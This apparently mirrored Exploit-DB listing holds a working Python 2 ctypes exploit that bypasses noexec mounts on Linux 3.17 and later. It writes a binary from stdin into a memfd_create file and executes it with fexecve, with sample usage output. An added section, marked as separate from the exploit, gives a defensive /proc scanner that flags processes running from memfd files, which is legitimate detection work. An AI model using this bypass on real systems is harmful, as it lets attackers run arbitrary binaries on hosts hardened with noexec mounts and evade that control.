Linux Kernel 3.17 – ‘Python ctypes and memfd_create’ noexec File Security Bypass

  • Author: soyer
    Date: 2015-10-15
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/38473/

    # Exploit Title: Linux >= 3.17 noexec bypass with python ctypes and memfd_create
    # Date: 2015.10.14
    # Exploit Author: soyer
    # Version: linux >= 3.17
    # Tested on: Ubuntu 15.04 (x86_64)
    #
    # usage:
    #
    # $ ls -la exec_file
    # -rwxr-xr-x 1 soyer soyer 8600 Oct 14 15:04 exec_file
    # $ ./exec_file
    # bash: ./exec_file: Permission denied
    # $ mount |grep $(pwd)
    # tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k)
    # $ python noexec.py < exec_file
    # Hello world! fprintf=0x400470, stdout=0x7f63a3933740
    
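    # Python 2 script; the ELF binary to run is supplied on stdin.
    from ctypes import *
    c = CDLL("libc.so.6")
    # syscall 319 is memfd_create on x86_64: an anonymous in-memory file, not on any noexec mount
    fd = c.syscall(319,"tempmem",0)
    # copy stdin (fd 0) into the memfd; 0x7ffff000 is the most sendfile transfers in one call
    c.sendfile(fd,0,0,0x7ffff000)
    # execute the memfd contents by descriptor, with empty argv and envp
    c.fexecve(fd,byref(c_char_p()),byref(c_char_p()))
    # reached only if fexecve returned, i.e. the exec did not happen
    print "fexecve failed"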
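
A defender-side check for the technique above, as an added example that is not part of the original exploit listing: a process started with fexecve on a memfd has a /proc/<pid>/exe link that begins with /memfd:, so scanning /proc for that prefix finds it no matter how the filesystems are mounted. The function names and the constructed sample tree are assumptions made for illustration.

```python
import os
import tempfile

MEMFD_PREFIX = "/memfd:"  # how the kernel names a memfd-backed file in /proc links


def find_memfd_processes(proc_root="/proc"):
    """Return [(pid, exe_target, cmdline)] for processes whose image is a memfd."""
    hits = []
    for entry in sorted(os.listdir(proc_root)):
        if not entry.isdigit():
            continue  # skip non-process entries such as /proc/meminfo
        base = os.path.join(proc_root, entry)
        try:
            target = os.readlink(os.path.join(base, "exe"))
        except OSError:
            continue  # kernel thread, exited process, or no permission
        if not target.startswith(MEMFD_PREFIX):
            continue
        try:
            with open(os.path.join(base, "cmdline"), "rb") as fh:
                raw = fh.read()
            cmdline = raw.replace(b"\0", b" ").strip().decode(errors="replace")
        except OSError:
            cmdline = ""
        hits.append((int(entry), target, cmdline))
    return hits


def build_sample_proc(root):
    """Constructed stand-in for /proc: pid 100 is ordinary, pid 200 runs from a memfd."""
    samples = {
        "100": ("/usr/bin/python2.7", b"python\0noexec.py\0"),
        "200": ("/memfd:tempmem (deleted)", b""),  # empty argv, as in the script above
    }
    for pid, (exe, cmdline) in samples.items():
        os.makedirs(os.path.join(root, pid))
        os.symlink(exe, os.path.join(root, pid, "exe"))
        with open(os.path.join(root, pid, "cmdline"), "wb") as fh:
            fh.write(cmdline)
    open(os.path.join(root, "meminfo"), "w").close()  # non-process entry to be skipped
    return root


if __name__ == "__main__":
    sample = build_sample_proc(tempfile.mkdtemp())
    for pid, target, cmdline in find_memfd_processes(sample):
        print(pid, target, repr(cmdline))
```

On a live host, call find_memfd_processes() with the default /proc as root so other users' exe links are readable. Some legitimate software also executes from a memfd, so treat hits as leads to triage.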